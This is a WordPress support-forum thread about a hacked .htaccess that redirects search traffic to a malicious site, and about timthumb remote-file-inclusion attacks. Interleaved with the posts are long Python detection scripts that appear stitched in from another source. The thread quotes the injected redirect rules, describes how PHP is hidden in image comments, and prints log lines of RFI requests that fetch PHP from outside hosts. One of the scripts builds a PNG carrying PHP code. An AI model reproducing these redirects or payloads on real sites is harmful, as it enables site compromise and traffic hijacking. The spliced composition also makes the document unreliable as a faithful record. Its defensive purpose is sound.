• Hello,

    I’m using the latest version of WP, i.e., v3.2.1.
    Site hosted on GoDaddy hosting.

    Previously my wp .htaccess was modified by someone,
    I removed the code and now again it’s modified with the same code.
    This code redirects my search engine traffic to some other website.

    I have mentioned this previously here:
    http://www.wpsecuritylock.com/wordpress-3-2-gershwin-is-released/comment-page-1/#comment-4687
    I really don’t know how it’s been done.

    Please advise me how to prevent this from happening again.

    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
    RewriteRule .* http : // sokoloperkovuskeci . com / in . php ? g = 56 [R,L]
    </IfModule>
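One way to catch this kind of injected block automatically, as an added example that is not code from the thread: the scanner below walks an .htaccess, pairs each RewriteCond on HTTP_REFERER with the RewriteRule that consumes it, and flags any external redirect gated on a search-engine referer. The sample .htaccess and the `attacker.example` host are constructed.

```python
import re

# Search engines named in the injected rules above (constructed list, extend as needed).
SEARCH_ENGINE_RE = re.compile(
    r"google|bing|yahoo|ask\.com|msn\.com|aol\.com|live\.com|altavista|excite", re.I)
REFERER_COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_REFERER\}\s+(\S+)", re.I)
REDIRECT_RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(https?://\S+)\s*\[([^\]]*)\]", re.I)

def find_referer_redirects(htaccess_text, own_hosts=()):
    """Return (line_no, target_url) for every RewriteRule that redirects ([R] flag)
    search-engine-referred visitors to a host not listed in own_hosts.
    Apache treats each RewriteCond as a precondition of the *next* RewriteRule,
    so conditions accumulate until a RewriteRule consumes them."""
    findings, pending_se_cond = [], False
    for no, line in enumerate(htaccess_text.splitlines(), 1):
        cond = REFERER_COND_RE.match(line)
        if cond:
            if SEARCH_ENGINE_RE.search(cond.group(1)):
                pending_se_cond = True
            continue
        rule = REDIRECT_RULE_RE.match(line)
        if rule:
            target, flags = rule.group(2), rule.group(3)
            host = re.sub(r"^https?://", "", target, flags=re.I).split("/")[0].lower()
            is_redirect = "R" in [f.strip().split("=")[0] for f in flags.split(",")]
            if pending_se_cond and is_redirect and host not in own_hosts:
                findings.append((no, target))
        if re.match(r"^\s*RewriteRule\b", line, re.I):
            pending_se_cond = False  # any RewriteRule consumes the RewriteConds before it
    return findings

# Constructed sample: the stock WordPress block followed by an injected block
# of the shape quoted in the post, with the redirect target replaced by a placeholder.
SAMPLE_HTACCESS = r"""# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://attacker.example/in.php?g=56 [R,L]
</IfModule>
"""
```

Running `find_referer_redirects(SAMPLE_HTACCESS)` reports only the injected rule; pass your own domains in `own_hosts` so legitimate redirects are not flagged.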
Viewing 15 replies - 31 through 45 (of 49 total)
  • This tricks the tinythumb.php script into downloading the file from dpprc.com. It is disguised as a PNG (with a binary PNG header), but has the following code in it:

    If a picture is opened in an image editor, like Gimp, one can edit the image comment, where PHP code is inserted.

    The image will still have a valid header; therefore it bypasses the getimagesize PHP check. PHP code inserted in the image comments still gets executed when the image is requested from a normal web browser.

    http://www.acunetix.com/websitesecurity/upload-forms-threat.htm
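To make the point above concrete, here is an added example (not from the post or the Acunetix article): it builds a PNG that is structurally valid, so a header-only check such as getimagesize() accepts it, yet carries a PHP tag in its comment chunk, and shows a chunk-walking check that catches the embedded code. The sample images and the PHP snippet inside them are constructed.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
# Opening tags PHP acts on; the bare short tag "<?" is left out so XML
# prologs inside image metadata do not trigger false positives.
PHP_TAG_RE = re.compile(rb"<\?php\b|<\?=", re.I)

def png_chunk(ctype, payload):
    """Encode one PNG chunk: 4-byte length, type, payload, CRC over type+payload."""
    crc = zlib.crc32(ctype + payload) & 0xFFFFFFFF
    return struct.pack(">I", len(payload)) + ctype + payload + struct.pack(">I", crc)

def build_png(text_chunks=(), width=1, height=1):
    """Build a tiny but fully valid 8-bit RGB PNG, optionally with tEXt (comment) chunks."""
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    rows = (b"\x00" + b"\x00" * 3 * width) * height  # filter byte + black pixels per row
    png = PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
    for text in text_chunks:
        png += png_chunk(b"tEXt", text)
    return png + png_chunk(b"IDAT", zlib.compress(rows)) + png_chunk(b"IEND", b"")

def has_valid_png_header(data):
    """Roughly what getimagesize() establishes: a PNG signature and a parsable IHDR."""
    if not data.startswith(PNG_SIGNATURE) or len(data) < 33:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    return ctype == b"IHDR" and length == 13

def find_embedded_php(data):
    """Walk every chunk and report the types of those whose payload carries a PHP tag,
    plus any bytes appended after IEND (which are not part of the image at all)."""
    hits, pos = [], len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if PHP_TAG_RE.search(data[pos + 8:pos + 8 + length]):
            hits.append(ctype.decode("ascii", "replace"))
        pos += 12 + length
        if ctype == b"IEND":
            break
    if PHP_TAG_RE.search(data[pos:]):
        hits.append("trailing-data")
    return hits

# Constructed samples: a clean image, and the same image with PHP in its comment chunk.
CLEAN_PNG = build_png()
TAINTED_PNG = build_png(text_chunks=[b"Comment\x00<?php echo 'injected'; ?>"])
```

Both samples pass `has_valid_png_header`, but only the tainted one (and anything with bytes appended after IEND) is reported by `find_embedded_php`; the durable fix is still to re-encode uploads and never let the PHP interpreter run files from the uploads directory.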

    Just got a warning via Firefox from stopbadware.com that searches were being redirected to sokoloperkovuskeci.com.

    I’ve never used timthumb and it isn’t installed.

    I’ve been running BulletProof for months and Sucuri says I’m not infected, blacklisted, etc.

    Is this a false positive or am I missing something?

    Hi roc69,

    please check your htaccess file for code that redirects Google and other search engines to sokoloperkovuskeci.com

    Did you check your theme and plugin folders for timthumb.php or thumb.php?
    If it wasn’t that, perhaps the attacker exploited another hole in WordPress to modify your htaccess file.

    I’ve put the site in maintenance mode while trying to figure this out. I don’t have thumb or timthumb installed.

    Here’s what’s in HTA.

    # BEGIN WordPress
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteBase /
    RewriteRule ^index\.php$ - [L]
    RewriteCond %{REQUEST_FILENAME} !-f
    RewriteCond %{REQUEST_FILENAME} !-d
    RewriteRule . /index.php [L]
    </IfModule>

    # END WordPress

    I think that looks OK.

    However, wp-config has some apparently funky code:

    define('AUTH_KEY', 'XRQ;,/[DX-^y~176ih)OO5TVYoG0J(ve)8FiT/w,UT>2V*,o,;r$ja;Di+^1CCHO');
    define('SECURE_AUTH_KEY', 'E!I{IyGv}j) 7,:}8pO9iMo1|_@{S-]lZ)2<O2G9~!F/JDlF8{awHm0obm =J?ne');
    define('LOGGED_IN_KEY', 'E&+w|9uB52zr3=P-59-n~-~8+(s-ci)@y*>Nuc3UB%q,>Rd7%pTxQ|%<aeCP@nvI');
    define('NONCE_KEY', '5*3Q.,06CcpWFZ{AFz#/ pBz0?O@C2@pJ |~U-h5JLmn =3e5/.p_n+JpV[|b>=D');
    /**#@-*/

    What to do next?

    Those keys are supposed to look like that.

    Great. What strange voodoo has been worked upon my site then?

    Here’s a twist. By the time I looked at the HTA and wp-config files, Go Daddy had already been in there and set things right; that’s why they were normal.

    The rep I spoke to today wasn’t aware that his technical people were aware of the problem and had already “fixed” it. Or, if he was, didn’t let on when he said the problem was actually with Google (!@#$!@#$)!

    Got an email from them this evening saying a problem had been detected and fixed “earlier this week.”

    Anyway, changed passwords, will reinstall much per the above and back to slugging it out for page views and CPM. Here’s hoping this is the end of “sokoloperkovuskeci.com”…

    Thank you, esmi.

    In your htaccess file, put in this line:

    <Files wp-config.php>
    order allow,deny
    deny from all
    </Files>
    Or this full article about protecting WordPress may help you.

    FilesMatch is a better method than Files. This .htaccess code is already in BulletProof Security if you want to grab it from there. Also some other critical files are protected as well.

    <FilesMatch "^(wp-config\.php|install\.php|\.htaccess|php\.ini|php5\.ini|readme\.html|bb-config\.php)">
    Deny from all
    # Allow from 88.55.66.200
    </FilesMatch>

    Thanks.

    A WP site I maintain has just been hit with the .htaccess hack, and I’m having trouble getting rid of it.

    I haven’t been able to find any of those thumbnailer scripts, either in any of my plugins or in my active theme. It might be somewhere in an inactive theme, though, if that could work – still checking through those.

    What I have done is replaced the bad .htaccess file with a new vanilla one, checked to make sure there were no other files anywhere on the site with recent dates (there weren’t, except for some photos in the uploads folder, but I checked all of those and they were actual photos that were in a blog post), changed all passwords, re-uploaded all WP core files, and installed Bulletproof Security.

    But I’m still having problems. Everything seemed briefly OK when I first replaced the .htaccess file, but then halfway through configuring BPS, suddenly all the links in the admin started redirecting to the attack site again (http://shugarmail.in/inox/).

    So I checked the .htaccess file again to see if it had already been replaced again – but it hadn’t been! The .htaccess file looks fine now, but links are still redirecting to the attack site, and I’m not sure how this is happening. The problem seemed to come back when I installed BPS for some reason.

    Right now, I can manually get to pages like BPS’s settings if I copy and paste the link into the browser’s address bar instead of clicking on it – if I click on any link, it sends me to the attack site. But I can’t actually save any changes from any page in the admin – that just sends me to the attack site as well.

    I can’t figure out how it could still be redirecting links when the .htaccess file is now back to its original state (i.e. nothing in it but the BEGIN WordPress / END WordPress lines), and no other files appear to have been modified. I didn’t spot any other .htaccess files elsewhere in the site when I was going through it… Is there some other way this could be happening?

    OK, I’ve tried a few more times manually replacing my .htaccess file with a new one, and even tried copying out the text shown on the BPS settings page for the secure .htaccess file and pasting it into my .htaccess file manually.

    But the same thing happens each time: it works very briefly, so that the first load of any admin page shows up properly (with its CSS styling intact, which is not the case when the link redirection is happening), but then as soon as I click on a link, submit a form or load any other page, even in a separate tab, the link redirection is back.

    And then when I go to check the .htaccess page again, it has always been restored to its plain BEGIN WordPress / END WordPress state. Except when I used the secure .htaccess code, and then it still showed the commented lines in that, but had stripped out all the active lines for some reason. So something appears to be stripping out all code from the .htaccess file for some reason.

    But the weird thing is, it’s NOT replacing it with the redirect code it originally had – that no longer seems to be present anywhere, but it must be, because the links are still redirecting.

    I’m totally confused. And it probably doesn’t help that it’s now 4:30 am and I’ve been working on this for 2.5 hours. I’m going to try and get some sleep and hope maybe someone who knows more about this than I do will have answered by tomorrow…

    OK, well, I hate to tell you this, but if your site has already been hacked, then you need to restore it from a good backup from before it was hacked. You can try to de-hack your site, but this is a very time-consuming thing to do. It is much simpler and quicker to just restore your site from a known good backup. Also, hopefully you have a good backup of your database so that you can restore that as well.

    BPS is designed to keep your site from being hacked, but if your site is already hacked then BPS does not de-hack it automatically. BPS is like a bank vault door. If the hackers have already previously gotten past the vault door, then the door is no longer protecting the vault.

    Hackers’ shell scripts like c99, r57 and AluCar give the hackers unlimited access to do anything they want with your website – create files, edit files, upload files, rename files, create database tables, edit database tables, delete database tables and much more. Shell scripts have their own admin login panel similar to the WP Dashboard and include all kinds of additional options to allow hackers to do whatever they want with your website.

    Thanks for your response.

    I can restore the database easily, and the plugins, themes, etc., and I’ve already restored the core WP files from a freshly downloaded copy. But I don’t think there is any recent backup of the uploads folder. 🙁

    The confusing thing is, there didn’t appear to be any other files in there with recent modification dates, other than the .htaccess file, and a small handful of photos, which I checked out and they were all actual photos from a recent blog post. So I can’t figure out where they could have uploaded any sort of shell script… Is there some way it could not be visible via FTP?

    I did find eventually that there were two copies of thumb.php in two themes I wasn’t using – can this exploit work with a non-active theme file? I’m now in the process of deleting every theme other than the two core ones and the one the site actually uses (which does not use any thumbnailer script).

    Typically you will find the initial Shell script file in a /cache or /temp folder. From there once a hacker has got his Shell script uploaded to your site they will then proceed to install typically anywhere from 1 to 100 backdoors and whatever else they want to install in your files or your DB.

    Yes, if you have a theme that is not active, the timthumb exploit still works. This is what some common timthumb RFI hacking attempts look like.

    This hacking attempt is spoofing the Google Bot User Agent too 😉
    >>>>>>>>>>> 404 Error Logged [12/03/2011 2:00 PM] <<<<<<<<<<<
    REMOTE_ADDR: 208.100.58.37
    Host Name: vps10.netwisp.net
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /aitpro-blog/wp-content/themes/primely-theme/scripts/temp/14f6402efe2220002abf444d3cb3e4d0.php
    QUERY_STRING:
    HTTP_USER_AGENT: Googlebot/2.1 (+http://www.google.com/bot.html)

    >>>>>>>>>>> 403 Error Logged [12/03/2011 2:00 PM] <<<<<<<<<<<
    REMOTE_ADDR: 208.100.58.37
    Host Name: vps10.netwisp.net
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /aitpro-blog//wp-content/themes/primely-theme/scripts/timthumb.php?src=http://www.myphotofolio.co.uk/myid.php
    QUERY_STRING:
    HTTP_USER_AGENT: Googlebot/2.1 (+http://www.google.com/bot.html)

    >>>>>>>>>>> 403 Error Logged [11/25/2011 7:40 AM] <<<<<<<<<<<
    REMOTE_ADDR: 178.63.59.195
    Host Name: ns4.uniwebhosting.com
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /aitpro-blog/tag/bps-testing-to-do-list//wp-content/plugins/dukapress/lib/thumb.php?src=http://picasa.com.erospc.com/no2.php
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
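The three log entries above carry the indicators worth alerting on: a thumbnailer script called with an off-site `src=`, a .php request inside a /temp or /cache directory, and a Googlebot User-Agent coming from a host whose reverse DNS is not Google’s. The detector below is an added example (not BulletProof Security’s own code); it parses this log format and classifies each entry, using the entries quoted above trimmed to the fields the checks use. Matching rDNS against `.googlebot.com` / `.google.com` is a constructed heuristic; a production check should also forward-confirm the name.

```python
import re
from urllib.parse import parse_qs, urlsplit

ENTRY_HEADER_RE = re.compile(r">{3,}\s*(\d{3}) Error Logged \[([^\]]+)\]\s*<{3,}")
THUMB_RE = re.compile(r"/(?:timthumb|thumb)\.php$", re.I)
PHP_IN_CACHE_RE = re.compile(r"/(?:cache|temp|tmp)/[^/]+\.php$", re.I)
GOOGLEBOT_RDNS = (".googlebot.com", ".google.com")  # where a genuine Googlebot resolves

def parse_bps_log(text):
    """Split a BulletProof Security style 403/404 log into one dict per entry."""
    entries, current = [], None
    for line in text.splitlines():
        header = ENTRY_HEADER_RE.match(line.strip())
        if header:
            current = {"status": header.group(1), "time": header.group(2)}
            entries.append(current)
        elif current is not None and ":" in line:
            key, _, value = line.strip().partition(":")
            current[key.strip()] = value.strip()
    return entries

def classify(entry):
    """Return the indicators an entry matches (empty list for an unremarkable hit)."""
    indicators = []
    parts = urlsplit(entry.get("REQUEST_URI", ""))
    if THUMB_RE.search(parts.path):
        src = parse_qs(parts.query).get("src", [""])[0]
        if re.match(r"https?://", src, re.I):  # off-site src = remote file inclusion attempt
            indicators.append("thumbnailer-remote-src:" + (urlsplit(src).hostname or "?"))
    if PHP_IN_CACHE_RE.search(parts.path):
        indicators.append("php-in-cache-dir")  # where dropped shells usually land
    ua, rdns = entry.get("HTTP_USER_AGENT", "").lower(), entry.get("Host Name", "").lower()
    if "googlebot" in ua and not rdns.endswith(GOOGLEBOT_RDNS):
        indicators.append("spoofed-googlebot")
    return indicators
# Sample log: the three entries quoted above, trimmed to the fields the checks use.
SAMPLE_LOG = """\
>>>>>>>>>>> 404 Error Logged [12/03/2011 2:00 PM] <<<<<<<<<<<
Host Name: vps10.netwisp.net
REQUEST_URI: /aitpro-blog/wp-content/themes/primely-theme/scripts/temp/14f6402efe2220002abf444d3cb3e4d0.php
HTTP_USER_AGENT: Googlebot/2.1 (+http://www.google.com/bot.html)
>>>>>>>>>>> 403 Error Logged [12/03/2011 2:00 PM] <<<<<<<<<<<
Host Name: vps10.netwisp.net
REQUEST_URI: /aitpro-blog//wp-content/themes/primely-theme/scripts/timthumb.php?src=http://www.myphotofolio.co.uk/myid.php
HTTP_USER_AGENT: Googlebot/2.1 (+http://www.google.com/bot.html)
>>>>>>>>>>> 403 Error Logged [11/25/2011 7:40 AM] <<<<<<<<<<<
Host Name: ns4.uniwebhosting.com
REQUEST_URI: /aitpro-blog/tag/bps-testing-to-do-list//wp-content/plugins/dukapress/lib/thumb.php?src=http://picasa.com.erospc.com/no2.php
HTTP_USER_AGENT: Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0
"""
```

A thumbnailer request whose `src` is a local path produces no indicator, so the rule stays quiet on legitimate use of the script.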

  • The topic ‘Wp .htaccess is hacked for the 2nd time’ is closed to new replies.